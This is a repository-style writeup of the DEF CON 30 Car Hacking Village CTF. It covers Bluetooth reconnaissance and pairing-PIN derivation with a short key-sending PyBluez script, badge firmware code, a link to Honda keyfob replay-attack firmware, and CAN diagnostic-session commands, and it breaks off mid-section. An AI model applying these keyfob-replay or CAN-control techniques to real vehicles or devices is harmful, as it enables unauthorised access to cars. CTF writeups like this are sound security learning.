├── .gitignore ├── assets ├── fw_image.bin ├── chv-badge.uf2 ├── redballoon.pcap ├── cod-calculator.png ├── crc16brute │ ├── Makefile │ └── crc16.c └── defcon_dump_crc.zip ├── CRCly.md ├── RedBalloon.md ├── HondaHack.md ├── README.md ├── BadgeHack.md ├── Bluey.md └── CloudCar.md /.gitignore: -------------------------------------------------------------------------------- 1 | .vscode/ 2 | assets/can-toys 3 | -------------------------------------------------------------------------------- /assets/fw_image.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/camercu/chv-ctf-2022-writeup/HEAD/assets/fw_image.bin -------------------------------------------------------------------------------- /assets/chv-badge.uf2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/camercu/chv-ctf-2022-writeup/HEAD/assets/chv-badge.uf2 -------------------------------------------------------------------------------- /assets/redballoon.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/camercu/chv-ctf-2022-writeup/HEAD/assets/redballoon.pcap -------------------------------------------------------------------------------- /assets/cod-calculator.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/camercu/chv-ctf-2022-writeup/HEAD/assets/cod-calculator.png -------------------------------------------------------------------------------- /assets/crc16brute/Makefile: -------------------------------------------------------------------------------- 1 | CFLAGS += -Wall -Wextra -Werror 2 | 3 | crc16: 4 | 5 | .PHONY: 6 | clean: 7 | $(RM) crc16 -------------------------------------------------------------------------------- /assets/defcon_dump_crc.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/camercu/chv-ctf-2022-writeup/HEAD/assets/defcon_dump_crc.zip -------------------------------------------------------------------------------- /CRCly.md: -------------------------------------------------------------------------------- 1 | # CRC'ly - 900 2 | 3 | This is a reverse engineering problem, in TriCore! Can you figure out what is going on under the hood? You might need a unicorn or a multi-headed serpent to help you out. You just have to figure out 4 things! 4 | 5 | Dump file: [defcon_dump_crc](assets/defcon_dump_crc.zip) 6 | 7 | -------------------------------------------------------------------------------- /RedBalloon.md: -------------------------------------------------------------------------------- 1 | # RedBalloon 2 | Hacking RedBalloon hardware 3 | 4 | ## Packet Capture the Flag - 500 5 | 6 | Redballoon has a pcap and a firmware image. Get it from them and update the firmware on the device with it to get the flag. 7 | 8 | RedBalloon has a tool for modifying firmware and repackaging it, called [OFRAK](https://ofrak.com/) 9 | 10 | ```bash 11 | 12 | ``` -------------------------------------------------------------------------------- /HondaHack.md: -------------------------------------------------------------------------------- 1 | # Honda Hack 2 | Challenges related to the recent Honda keyfob replay attack. 3 | 4 | The car had a big sheet of paper with a QR code on it. I scanned the QR code, and it brought me to a Github page with Flipper Zero firmware that can perform a replay attack to unlock the doors: 5 | 6 | [FlipperZero Honda Hack Firmware](https://github.com/nonamecoder/FlipperZeroHondaFirmware) 7 | 8 | ## What is the Honda Keyfob’s FCC ID? - 150 9 | 10 | Website for flipper zero firmware says the FCC ID is: 11 | 12 | ``` 13 | KR5V2X 14 | ``` 15 | 16 | 17 | ## What frequency does the key fob operate on? - 200 18 | HINT: Check the available  frequencies on Flipper with custom firmware 19 | 20 | From the same firmware page: 21 | 22 | ``` 23 | 433.65 24 | ``` -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Car Hacking Village CTF - DEF CON 30 2 | 3 | Here is my writeup for the Car Hacking Village (CHV) Capture the Flag (CTF), 4 | from DEF CON 30 (11-14 August 2022). 5 | 6 | ## Challenge Sets: 7 | 8 | - 3P0 - Get the VINs and program the VIN of one of the ECUs in a bench setup. Did not attempt. 9 | - [BadgeHack](BadgeHack.md) - Hacking the CHV Badge (Raspberry Pi Pico) 10 | - [Bluey](Bluey.md) - Bluetooth challenges 11 | - [CloudCar](CloudCar.md) - virtual CAN bus hacking 12 | - [CRC'ly](CRCly.md) - Highest point problem; RE for flag 13 | - DIY - build your own CAN bus. Did not attempt. 14 | - [HondaHack](HondaHack.md) - Recent CVE for Honda Key Fobs 15 | - NERF Platform - shoot a nerf dart from truck brakes. Did not attempt. 16 | - READ ME FIRST - Flags from reading the [rules](https://www.carhackingvillage.com/ctf-rules-2022). Not worth writeup. 17 | - [RedBalloon](RedBalloon.md) - Hacking RedBalloon hardware -------------------------------------------------------------------------------- /assets/crc16brute/crc16.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // 0xc1c0 6 | 7 | uint16_t crc16_update(uint16_t crc, uint8_t a) { 8 | int i; 9 | crc ^= a; 10 | for (i = 0; i < 8; ++i) { 11 | if (crc & 1) 12 | crc = (crc >> 1) ^ 0xA001; 13 | else 14 | crc = (crc >> 1); 15 | } 16 | return crc; 17 | } 18 | 19 | uint16_t crc16(uint8_t *buf, size_t len, uint16_t initial) { 20 | size_t i; 21 | uint16_t crc = initial; 22 | for (i = 0; i < len; i++) { 23 | crc = crc16_update(crc, buf[i]); 24 | } 25 | return crc; 26 | } 27 | 28 | void print_table(void) { 29 | uint16_t crc; 30 | printf("table = { "); 31 | for (int b = 0; b < 256; b++){ 32 | crc = crc16_update((uint16_t)b << 8, (uint8_t)b); 33 | printf("0x%04x, ", crc); 34 | } 35 | printf(" };\n"); 36 | } 37 | 38 | int main(void) { 39 | print_table(); 40 | return 0; 41 | } 42 | -------------------------------------------------------------------------------- /BadgeHack.md: -------------------------------------------------------------------------------- 1 | # Badge Hack 2 | Hacking the CHV Badge (Raspberry Pi Pico) 3 | 4 | ## Resources 5 | - [Getting Started With Pico](https://datasheets.raspberrypi.com/pico/getting-started-with-pico.pdf) 6 | - [Pico C/C++ SDK](https://datasheets.raspberrypi.com/pico/raspberry-pi-pico-c-sdk.pdf) 7 | - [Pico MicroPython SDK](https://datasheets.raspberrypi.com/pico/raspberry-pi-pico-python-sdk.pdf) 8 | - [RP2040 Microcontroller](https://www.raspberrypi.com/documentation/microcontrollers/rp2040.html) 9 | - [How To: Buzzer Music with Pico](https://www.tomshardware.com/how-to/buzzer-music-raspberry-pi-pico) 10 | - [Raspberry Pi Buzzer Player (many songs)](https://github.com/gumslone/raspi_buzzer_player) 11 | 12 | ## 7 note Mario - 200 13 | 14 | Make the buzzer play the first 7 notes of the Super Mario theme 15 | 16 | ## LED sync - 150 17 | 18 | Make some LEDs sync with the Super Mario. Make it flashy! 19 | 20 | ## Solution 21 | First, backup the old firmware so you can restore it later. 22 | 23 | ```bash 24 | ./picotool save -a ~/Desktop/chv-badge.uf2 25 | ``` 26 | 27 | Then, install the [MicroPython image](https://micropython.org/download/rp2-pico/rp2-pico-latest.uf2) for the Raspberry Pi Pico. Just download, then drag and drop into the volume that mounts when you connect to the badge over USB in BOOTSEL mode (hold down BOOTSEL button when plugging in the badge). 28 | 29 | I used the [Pico Go](https://marketplace.visualstudio.com/items?itemName=Drincann.pico-go) extension for VSCode to develop on the board, which I learned about from reading [this blog](https://community.element14.com/members-area/personalblogs/b/andy-clark-s-blog/posts/vscode-and-micropython-for-the-pi-pico). This made it easy to test as I went (just click "Run" to see how things are working). 30 | 31 | My code solves both challenges (plays Mario theme, with LEDs in eyes flashing to the music). 32 | 33 | ```python 34 | #!/usr/bin/env python 35 | from machine import Pin, PWM 36 | from utime import sleep 37 | from random import choice 38 | 39 | 40 | BUZZER_PIN = 20 41 | buzzer = PWM(Pin(BUZZER_PIN)) 42 | volume = 50 # % of max 43 | level = round(5000 * volume / 100) # volume level for duty cycle 44 | 45 | LEYEC_PIN = 26 46 | LEYEC = Pin(LEYEC_PIN, Pin.OUT) 47 | LEYE1_PIN = 22 48 | LEYE1 = Pin(LEYE1_PIN, Pin.OUT) 49 | LEYE2_PIN = 21 50 | LEYE2 = Pin(LEYE2_PIN, Pin.OUT) 51 | LEYE3_PIN = 27 52 | LEYE3 = Pin(LEYE3_PIN, Pin.OUT) 53 | 54 | REYEC_PIN = 10 55 | REYEC = Pin(REYEC_PIN, Pin.OUT) 56 | REYE1_PIN = 12 57 | REYE1 = Pin(REYE1_PIN, Pin.OUT) 58 | REYE2_PIN = 13 59 | REYE2 = Pin(REYE2_PIN, Pin.OUT) 60 | REYE3_PIN = 11 61 | REYE3 = Pin(REYE3_PIN, Pin.OUT) 62 | 63 | LEYE = [LEYEC, LEYE1, LEYE2, LEYE3] 64 | LEYE_IRIS = [LEYE1, LEYE2, LEYE3] 65 | REYE = [REYE1, REYE1, REYE2, REYE3] 66 | REYE_IRIS = [REYE1, REYE2, REYE3] 67 | PUPILS = [LEYEC, REYEC] 68 | IRISES = LEYE_IRIS + REYE_IRIS 69 | EYES = LEYE + REYE 70 | EYES_GROUPS = [LEYE, REYE, LEYE_IRIS, REYE_IRIS, PUPILS, IRISES, EYES] 71 | 72 | notes = { 73 | "B0": 31, 74 | "C1": 33, 75 | "CS1": 35, 76 | "D1": 37, 77 | "DS1": 39, 78 | "EB1": 39, 79 | "E1": 41, 80 | "F1": 44, 81 | "FS1": 46, 82 | "G1": 49, 83 | "GS1": 52, 84 | "A1": 55, 85 | "AS1": 58, 86 | "BB1": 58, 87 | "B1": 62, 88 | "C2": 65, 89 | "CS2": 69, 90 | "D2": 73, 91 | "DS2": 78, 92 | "EB2": 78, 93 | "E2": 82, 94 | "F2": 87, 95 | "FS2": 93, 96 | "G2": 98, 97 | "GS2": 104, 98 | "A2": 110, 99 | "AS2": 117, 100 | "BB2": 123, 101 | "B2": 123, 102 | "C3": 131, 103 | "CS3": 139, 104 | "D3": 147, 105 | "DS3": 156, 106 | "EB3": 156, 107 | "E3": 165, 108 | "F3": 175, 109 | "FS3": 185, 110 | "G3": 196, 111 | "GS3": 208, 112 | "A3": 220, 113 | "AS3": 233, 114 | "BB3": 233, 115 | "B3": 247, 116 | "C4": 262, 117 | "CS4": 277, 118 | "D4": 294, 119 | "DS4": 311, 120 | "EB4": 311, 121 | "E4": 330, 122 | "F4": 349, 123 | "FS4": 370, 124 | "G4": 392, 125 | "GS4": 415, 126 | "A4": 440, 127 | "AS4": 466, 128 | "BB4": 466, 129 | "B4": 494, 130 | "C5": 523, 131 | "CS5": 554, 132 | "D5": 587, 133 | "DS5": 622, 134 | "EB5": 622, 135 | "E5": 659, 136 | "F5": 698, 137 | "FS5": 740, 138 | "G5": 784, 139 | "GS5": 831, 140 | "A5": 880, 141 | "AS5": 932, 142 | "BB5": 932, 143 | "B5": 988, 144 | "C6": 1047, 145 | "CS6": 1109, 146 | "D6": 1175, 147 | "DS6": 1245, 148 | "EB6": 1245, 149 | "E6": 1319, 150 | "F6": 1397, 151 | "FS6": 1480, 152 | "G6": 1568, 153 | "GS6": 1661, 154 | "A6": 1760, 155 | "AS6": 1865, 156 | "BB6": 1865, 157 | "B6": 1976, 158 | "C7": 2093, 159 | "CS7": 2217, 160 | "D7": 2349, 161 | "DS7": 2489, 162 | "EB7": 2489, 163 | "E7": 2637, 164 | "F7": 2794, 165 | "FS7": 2960, 166 | "G7": 3136, 167 | "GS7": 3322, 168 | "A7": 3520, 169 | "AS7": 3729, 170 | "BB7": 3729, 171 | "B7": 3951, 172 | "C8": 4186, 173 | "CS8": 4435, 174 | "D8": 4699, 175 | "DS8": 4978, 176 | } 177 | 178 | melody = [ 179 | notes["E7"], 180 | notes["E7"], 181 | 0, 182 | notes["E7"], 183 | 0, 184 | notes["C7"], 185 | notes["E7"], 186 | 0, 187 | notes["G7"], 188 | 0, 189 | 0, 190 | 0, 191 | notes["G6"], 192 | 0, 193 | 0, 194 | 0, 195 | notes["C7"], 196 | 0, 197 | 0, 198 | notes["G6"], 199 | 0, 200 | 0, 201 | notes["E6"], 202 | 0, 203 | 0, 204 | notes["A6"], 205 | 0, 206 | notes["B6"], 207 | 0, 208 | notes["AS6"], 209 | notes["A6"], 210 | 0, 211 | notes["G6"], 212 | notes["E7"], 213 | notes["G7"], 214 | notes["A7"], 215 | 0, 216 | notes["F7"], 217 | notes["G7"], 218 | 0, 219 | notes["E7"], 220 | 0, 221 | notes["C7"], 222 | notes["D7"], 223 | notes["B6"], 224 | 0, 225 | 0, 226 | notes["C7"], 227 | 0, 228 | 0, 229 | notes["G6"], 230 | 0, 231 | 0, 232 | notes["E6"], 233 | 0, 234 | 0, 235 | notes["A6"], 236 | 0, 237 | notes["B6"], 238 | 0, 239 | notes["AS6"], 240 | notes["A6"], 241 | 0, 242 | notes["G6"], 243 | notes["E7"], 244 | notes["G7"], 245 | notes["A7"], 246 | 0, 247 | notes["F7"], 248 | notes["G7"], 249 | 0, 250 | notes["E7"], 251 | 0, 252 | notes["C7"], 253 | notes["D7"], 254 | notes["B6"], 255 | 0, 256 | 0, 257 | ] 258 | 259 | tempo = [ 260 | 12, 261 | 12, 262 | 12, 263 | 12, 264 | 12, 265 | 12, 266 | 12, 267 | 12, 268 | 12, 269 | 12, 270 | 12, 271 | 12, 272 | 12, 273 | 12, 274 | 12, 275 | 12, 276 | 12, 277 | 12, 278 | 12, 279 | 12, 280 | 12, 281 | 12, 282 | 12, 283 | 12, 284 | 12, 285 | 12, 286 | 12, 287 | 12, 288 | 12, 289 | 12, 290 | 12, 291 | 12, 292 | 9, 293 | 9, 294 | 9, 295 | 12, 296 | 12, 297 | 12, 298 | 12, 299 | 12, 300 | 12, 301 | 12, 302 | 12, 303 | 12, 304 | 12, 305 | 12, 306 | 12, 307 | 12, 308 | 12, 309 | 12, 310 | 12, 311 | 12, 312 | 12, 313 | 12, 314 | 12, 315 | 12, 316 | 12, 317 | 12, 318 | 12, 319 | 12, 320 | 12, 321 | 12, 322 | 12, 323 | 9, 324 | 9, 325 | 9, 326 | 12, 327 | 12, 328 | 12, 329 | 12, 330 | 12, 331 | 12, 332 | 12, 333 | 12, 334 | 12, 335 | 12, 336 | 12, 337 | 12, 338 | ] 339 | 340 | 341 | def toggle_leds(leds): 342 | for led in leds: 343 | led.toggle() 344 | 345 | 346 | def buzz(frequency, length): 347 | if frequency == 0: 348 | sleep(length) 349 | return 350 | 351 | buzzer.freq(frequency) 352 | buzzer.duty_u16(level) 353 | leds = choice(EYES_GROUPS) 354 | toggle_leds(leds) 355 | sleep(length) 356 | toggle_leds(leds) 357 | buzzer.duty_u16(0) 358 | 359 | 360 | def play(melody, tempo, pause, pace=0.800): 361 | for i in range(0, len(melody)): # Play song 362 | noteDuration = pace / tempo[i] 363 | buzz(melody[i], noteDuration) # Change the frequency along the song note 364 | 365 | pauseBetweenNotes = noteDuration * pause 366 | sleep(pauseBetweenNotes) 367 | 368 | 369 | def silence(): 370 | buzzer.duty_u16(0) 371 | 372 | 373 | if __name__ == "__main__": # Program start from here 374 | print("Playing Super Mario Brothers") 375 | try: 376 | while True: 377 | play(melody, tempo, 0.30, 1.2000) 378 | sleep(1) 379 | except: 380 | silence() 381 | ``` 382 | -------------------------------------------------------------------------------- /Bluey.md: -------------------------------------------------------------------------------- 1 | # Bluey 2 | 3 | Bluetooth-related challenges. 4 | 5 | Before you start: 6 | 7 | ```bash 8 | # install bluetooth tools on Linux 9 | $ sudo apt update 10 | $ sudo apt install -y bluetooth bluez bluez-tools rfkill 11 | 12 | # ensure your user is added to the 'lp' group to allow pairing 13 | $ sudo usermod -aG lp $USER 14 | $ sudo newgrp lp 15 | 16 | # make sure you have a bluetooth device available on your computer 17 | $ hcitool dev 18 | Devices: 19 | hci1 B8:27:EB:76:11:25 20 | 21 | # if necessary, restart bluetooth service 22 | $ service bluetooth restart 23 | $ service dbus restart 24 | 25 | # disable/enable bluetooth device 26 | $ hciconfig hci0 down 27 | $ hciconfig hci0 up 28 | 29 | # check that bluetooth isn't blocked by rfkill 30 | $ sudo rfkill 31 | $ sudo rfkill unblock bluetooth 32 | 33 | # scan for bluetooth LE devices (find desired MAC, or name if lucky) 34 | $ sudo hcitool lescan 35 | LE Scan ... 36 | 00:19:5D:37:FD:EA OroJackson 37 | --- snip --- 38 | ``` 39 | 40 | ## May I Speak to the Manager? - 15 41 | 42 | What is the LMP version in use by the CTF Device? 43 | 44 | ```bash 45 | $ sudo hcitool lescan 46 | LE Scan ... 47 | 00:19:5D:37:FD:EA OroJackson 48 | --- snip --- 49 | 50 | $ hcitool info 00:19:5D:37:FD:EA 51 | Requesting information ... 52 | BD Address: 00:19:5D:37:FD:EA 53 | OUI Company: ShenZhen XinHuaTong Opto Electronics Co.,Ltd (00-19-5D) 54 | Device Name: OroJackson 55 | LMP Version: 4.1 (0x7) LMP Subversion: 0x2209 # <== THIS 56 | Manufacturer: Broadcom Corporation (15) 57 | Features page 0: 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87 58 | <3-slot packets> <5-slot packets> 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | <3-slot EDR ACL> 67 | <5-slot EDR ACL> 68 | 69 | <3-slot EDR eSCO> 70 | 71 | 72 | 73 | Features page 1: 0x0a 0x00 0x00 0x00 0x00 0x00 0x00 0x00 74 | Features page 2: 0x13 0x03 0x00 0x00 0x00 0x00 0x00 0x00 75 | ``` 76 | 77 | LMP Version: `4.1` 78 | 79 | 80 | ## Did you do your homework? - 15 81 | 82 | BT devices will be assigned a "Class of device" to let other devices know what type of device they are communicating with. What is the class of device for the CTF Device? 83 | 84 | ```bash 85 | # Inquire about device classes 86 | $ hcitool inq 87 | Inquiring ... 88 | F8:4D:89:79:F2:5A clock offset: 0x68f0 class: 0x280104 89 | 00:19:5D:37:FD:EA clock offset: 0x6a7c class: 0x5a020c # <== THIS ONE 90 | --- snip --- 91 | ``` 92 | 93 | To translate the class of device, use this webpage: 94 | - [Class of Device (CoD) Calculator](https://www.ampedrftech.com/cod.htm) 95 | 96 | ![](assets/cod-calculator.png) 97 | 98 | Class of Device: `Phone` 99 | 100 | 101 | ## Yu Yu Identifier - 15 102 | 103 | Bluetooth services will always come with a UUID (Universally Unique Identifier) to let other devices know what they’re supposed to do. What is the UUID of the custom Bluetooth Service? 104 | 105 | ```bash 106 | $ sdptool browse 00:19:5D:37:FD:EA 107 | Browsing 00:19:5D:37:FD:EA ... 108 | Service Search failed: Invalid argument 109 | Service Name: Moby_Dick # <== Custom Service name 110 | Service Description: The first key is hidden in another service on this machine! Search the sdp server for the service with the RecHandle 0x80108. The key is the value of Attribute Identifier 2022. Do you know how to browse Attribute Identifiers? 111 | Service Provider: The pairing PIN is the inverse of the last 2 bytes of the BT Address! Btw heres another flag: Suzumebachi # <== Flag 112 | Service RecHandle: 0x10006 113 | Service Class ID List: 114 | UUID 128: 88888888-1111-0000-1111-888888888888 # <== UUID 115 | "Serial Port" (0x1101) 116 | Protocol Descriptor List: 117 | "L2CAP" (0x0100) 118 | "RFCOMM" (0x0003) 119 | Channel: 26 # <== RFCOMM Channel 120 | Profile Descriptor List: 121 | "Serial Port" (0x1101) 122 | Version: 0x0100 123 | ``` 124 | 125 | UUID: `88888888-1111-0000-1111-888888888888` 126 | 127 | 128 | ## This remote is broken… - 15 129 | 130 | What RFCOMM Channel is the custom Bluetooth Service using? 131 | 132 | See previous challenge output for solution steps. 133 | 134 | RFCOMM Channel: `26` 135 | 136 | 137 | ## This wasn’t in the manual… - 20 138 | 139 | The CTF Device is hosting a custom Bluetooth Service. What is the name of this service? 140 | 141 | See [Yu Yu Identifier](#Yu%20Yu%20Identifier%20-%2015) challenge output for solution steps. 142 | 143 | Service Name: `Moby_Dick` 144 | 145 | 146 | 147 | ## Address - 25 148 | 149 | What is the Bluetooth Address of the CTF Device? 150 | 151 | ```bash 152 | $ sudo hcitool lescan 153 | LE Scan ... 154 | 00:19:5D:37:FD:EA OroJackson 155 | --- snip --- 156 | ``` 157 | 158 | BT Address: `00:19:5D:37:FD:EA` 159 | 160 | 161 | ## Lays or Pringles? - 25 162 | 163 | Who is the chip manufacturer of the Bluetooth chip on the CTF Device? 164 | 165 | ```bash 166 | $ hcitool info 00:19:5D:37:FD:EA 167 | Requesting information ... 168 | BD Address: 00:19:5D:37:FD:EA 169 | OUI Company: ShenZhen XinHuaTong Opto Electronics Co.,Ltd (00-19-5D) 170 | Device Name: OroJackson 171 | LMP Version: 4.1 (0x7) LMP Subversion: 0x2209 172 | Manufacturer: Broadcom Corporation (15) # <== Chip Manufacturer 173 | Features page 0: 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87 174 | <3-slot packets> <5-slot packets> 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | <3-slot EDR ACL> 183 | <5-slot EDR ACL> 184 | 185 | <3-slot EDR eSCO> 186 | 187 | 188 | 189 | Features page 1: 0x0a 0x00 0x00 0x00 0x00 0x00 0x00 0x00 190 | Features page 2: 0x13 0x03 0x00 0x00 0x00 0x00 0x00 0x00 191 | ``` 192 | 193 | Chip Manufacturer: `Broadcom` 194 | 195 | 196 | ## Name - 25 197 | 198 | What is the name of the CTF Device? 199 | 200 | ```bash 201 | $ sudo hcitool lescan 202 | LE Scan ... 203 | 00:19:5D:37:FD:EA OroJackson 204 | --- snip --- 205 | ``` 206 | 207 | Device name: `OroJackson` 208 | 209 | 210 | ## Walmart or Costco? - 25 211 | 212 | Who is the OUI of the CTF Device? 213 | 214 | ```bash 215 | $ hcitool info 00:19:5D:37:FD:EA 216 | Requesting information ... 217 | BD Address: 00:19:5D:37:FD:EA 218 | OUI Company: ShenZhen XinHuaTong Opto Electronics Co.,Ltd (00-19-5D) # <== THIS 219 | Device Name: OroJackson 220 | LMP Version: 4.1 (0x7) LMP Subversion: 0x2209 221 | Manufacturer: Broadcom Corporation (15) 222 | Features page 0: 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87 223 | <3-slot packets> <5-slot packets> 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | <3-slot EDR ACL> 232 | <5-slot EDR ACL> 233 | 234 | <3-slot EDR eSCO> 235 | 236 | 237 | 238 | Features page 1: 0x0a 0x00 0x00 0x00 0x00 0x00 0x00 0x00 239 | Features page 2: 0x13 0x03 0x00 0x00 0x00 0x00 0x00 0x00 240 | ``` 241 | 242 | OUI: `ShenZen` 243 | 244 | 245 | ## Secret Flag - 25 246 | 247 | It’s right there 248 | 249 | ```bash 250 | $ sdptool browse 00:19:5D:37:FD:EA 251 | Browsing 00:19:5D:37:FD:EA ... 252 | Service Search failed: Invalid argument 253 | Service Name: Moby_Dick 254 | Service Description: The first key is hidden in another service on this machine! Search the sdp server for the service with the RecHandle 0x80108. The key is the value of Attribute Identifier 2022. Do you know how to browse Attribute Identifiers? 255 | Service Provider: The pairing PIN is the inverse of the last 2 bytes of the BT Address! Btw heres another flag: Suzumebachi # <== Flag 256 | Service RecHandle: 0x10006 257 | Service Class ID List: 258 | UUID 128: 88888888-1111-0000-1111-888888888888 259 | "Serial Port" (0x1101) 260 | Protocol Descriptor List: 261 | "L2CAP" (0x0100) 262 | "RFCOMM" (0x0003) 263 | Channel: 26 264 | Profile Descriptor List: 265 | "Serial Port" (0x1101) 266 | Version: 0x0100 267 | ``` 268 | 269 | Secret Flag: `Suzumebachi` 270 | 271 | 272 | ## Secret Key 1 - 25 273 | 274 | Hidden in the information you’ve looked through to answer the challenges so far is one of the last two keys! You need the first one to get the second one. 275 | 276 | The hint from the Moby_Dick service's description says: 277 | ``` 278 | The first key is hidden in another service on this machine! Search the sdp server for the service with the RecHandle 0x80108. The key is the value of Attribute Identifier 2022. Do you know how to browse Attribute Identifiers? 279 | ``` 280 | 281 | So we need to look for the service with RecHandle `0x80108`: 282 | ```bash 283 | $ sdptool browse --tree 00:19:5D:37:FD:EA 284 | Browsing 00:19:5D:37:FD:EA ... 285 | --- snip --- 286 | Attribute Identifier : 0x0 - ServiceRecordHandle 287 | Integer : 0x80108 # <== Matching RecHandle 288 | Attribute Identifier : 0x1 - ServiceClassIDList 289 | Data Sequence 290 | UUID16 : 0x1106 - OBEXFileTransfer 291 | Attribute Identifier : 0x4 - ProtocolDescriptorList 292 | Data Sequence 293 | Data Sequence 294 | UUID16 : 0x0100 - L2CAP 295 | Data Sequence 296 | UUID16 : 0x0003 - RFCOMM 297 | Channel/Port (Integer) : 0xa 298 | Data Sequence 299 | UUID16 : 0x0008 - OBEX 300 | Attribute Identifier : 0x5 - BrowseGroupList 301 | Data Sequence 302 | UUID16 : 0x1002 - PublicBrowseGroup 303 | Attribute Identifier : 0x9 - BluetoothProfileDescriptorList 304 | Data Sequence 305 | Data Sequence 306 | UUID16 : 0x1106 - OBEXFileTransfer 307 | Version (Integer) : 0x100 308 | Attribute Identifier : 0x100 309 | Data : 4f 42 45 58 20 46 69 6c 65 20 54 72 61 6e 73 66 65 72 00 310 | Attribute Identifier : 0x2022 # <== Matching Attribute ID 311 | Data : 47 75 6e 67 6e 69 72 00 # <== hex-encoded key 312 | --- snip --- 313 | ``` 314 | 315 | So the key is `47 75 6e 67 6e 69 72 00`, which is a hex-encoded string. To decode it, you can use [CyberChef](https://cyberchef.org/#recipe=From_Hex('Auto')To_Hexdump(16,false,false,false)&input=NDcgNzUgNmUgNjcgNmUgNjkgNzIgMDA) or the command line: 316 | 317 | ```bash 318 | $ echo "47 75 6e 67 6e 69 72 00" | xxd -r -p 319 | Gungnir 320 | ``` 321 | 322 | Secret Key: `Gungnir` 323 | 324 | 325 | ## This is side one, flip me over - 30 326 | 327 | What is the Record Handle for the Bluetooth Service you were asked to look through for a hint? 328 | 329 | ```bash 330 | $ sdptool browse 00:19:5D:37:FD:EA 331 | Browsing 00:19:5D:37:FD:EA ... 332 | Service Search failed: Invalid argument 333 | Service Name: Moby_Dick 334 | Service Description: The first key is hidden in another service on this machine! Search the sdp server for the service with the RecHandle 0x80108. The key is the value of Attribute Identifier 2022. Do you know how to browse Attribute Identifiers? 335 | Service Provider: The pairing PIN is the inverse of the last 2 bytes of the BT Address! Btw heres another flag: Suzumebachi 336 | Service RecHandle: 0x10006 # <== Service Record Handle 337 | Service Class ID List: 338 | UUID 128: 88888888-1111-0000-1111-888888888888 339 | "Serial Port" (0x1101) 340 | Protocol Descriptor List: 341 | "L2CAP" (0x0100) 342 | "RFCOMM" (0x0003) 343 | Channel: 26 344 | Profile Descriptor List: 345 | "Serial Port" (0x1101) 346 | Version: 0x0100 347 | ``` 348 | 349 | Service Record Handle: `0x10006` 350 | 351 | 352 | ## Do you like pears or apples better? - 30 353 | 354 | This device uses a fixed PIN code to pair with devices! That is an incredibly insecure way to configure a device, but I did it anyway! What is that PIN? 355 | 356 | From the hint in the output of the previous command (Service Provider field): 357 | 358 | ``` 359 | The pairing PIN is the inverse of the last 2 bytes of the BT Address! 360 | ``` 361 | 362 | The BT Address is `00:19:5D:37:FD:EA`, so the last two bytes are `FD:EA`. Inverting the bits and printing the resulting hex, we get the following: 363 | 364 | ```bash 365 | $ python -c 'print(f"{(~0xFDEA) & 0xFFFF:04x}")' 366 | 0215 367 | 368 | # To pair to the CTF device (not required to solve challenge) 369 | $ sudo bluetoothctl 370 | [bluetooth]> scan # put nearby devices into bluetoothctl database 371 | [bluetooth]> pair 00:19:5D:37:FD:EA # enter PIN when prompted 372 | # optionally, trust the device for easier furture connections 373 | [bluetooth]> trust 00:19:5D:37:FD:EA 374 | 375 | # maybe try this to pair with pin? 376 | # http://www.heatxsink.com/entry/how-to-pair-a-bluetooth-device-from-command-line-on-linux 377 | # rfcomm connect /dev/rfcomm0 00:11:22:33:44:55 1 & 378 | 379 | # Additionally, it is good practice to enable secure simple pairing and enable page and inquiry scan with the following commands: 380 | # hciconfig hci0 sspmode 1 381 | # hciconfig hci0 piscan 382 | ``` 383 | 384 | Pairing pin: `0215` 385 | 386 | 387 | ## Secret Key 2 - 150 388 | 389 | Well done, you’ve found the first key! Now use it to unlock the second key. 390 | 391 | ```bash 392 | # first install the necessary python library to interact with bluetooth 393 | $ pip install PyBluez 394 | ``` 395 | 396 | Then create the following file to send the data to the appropriate service. 397 | 398 | `getkey2.py`: 399 | ```python 400 | import bluetooth 401 | 402 | btsock = bluetooth.BluetoothSocket( bluetooth.RFCOMM ) 403 | btsock.connect(("00:19:5D:37:FD:EA", 26)) 404 | btsock.send(b"Gungnir\x00") 405 | print(btsock.recv(2049)) 406 | btsock.close() 407 | ``` 408 | 409 | Run the script, and it will spit out a message with the key. 410 | 411 | -------------------------------------------------------------------------------- /CloudCar.md: -------------------------------------------------------------------------------- 1 | # Cloud Car 2 | Virtual can bus hacking at https://cloudcar.canbushack.com/simulator 3 | 4 | 5 | ## Cloud Car START HERE - 100 6 | 7 | Please go to [https://cloudcar.canbushack.com](https://cloudcar.canbushack.com) 8 | 9 | Cloud Car is FREE during Def Con. 10 | 11 | Please watch the YouTube Getting Started if you have any questions: [https://youtu.be/0CjFu-K3gNY](https://youtu.be/0CjFu-K3gNY) 12 | 13 | Like the video Please!! It's my first one ever. 14 | 15 | Flag is guessable. 16 | 17 | Guesses: 18 | - canbushack 19 | 20 | - carfucar 21 | 22 | - cloudcar 23 | 24 | - hacktheplanet 25 | 26 | Told after competition that flag was: `{flag}cloudcar` 27 | 28 | 29 | ## Kylle Door Open - 50 30 | 31 | With [Cloud Car](https://cloudcar.canbushack.com) 32 | 33 | Using CAN Messaging, open the **Driver Door**. 34 | 35 | [https://cloudcar.canbushack.com](https://cloudcar.canbushack.com) 36 | 37 | Looking at `cansniffer`, see messages from ArbId 12D that update when the door is opened/closed. Tried sending my own messages with that ArbID, but was dead end. Likely that these are just status messages, and control happens elswhere. 38 | 39 | From `@fearfulspoon` on Discord: 40 | 41 | - enumerated for ECUs 42 | - enumerated for Services across those ECUs 43 | - enumerated for Sub-functions across those services 44 | 45 | For the physical stuff, I started looking at service 46 | 47 | ``` 48 | 0x2F - INPUT_OUTPUT_CONTROL_BY_IDENTIFIER 49 | ``` 50 | 51 | At first I got back a bunch of "nopes" on those scans, but then I ran them after starting a Diagnostic Control Session. 52 | 53 | ```bash 54 | # Send Diag control prior to scan. 55 | cansend vcan0 '620#0210020000000000' 56 | 57 | # enumerate subfunctions for 2F - 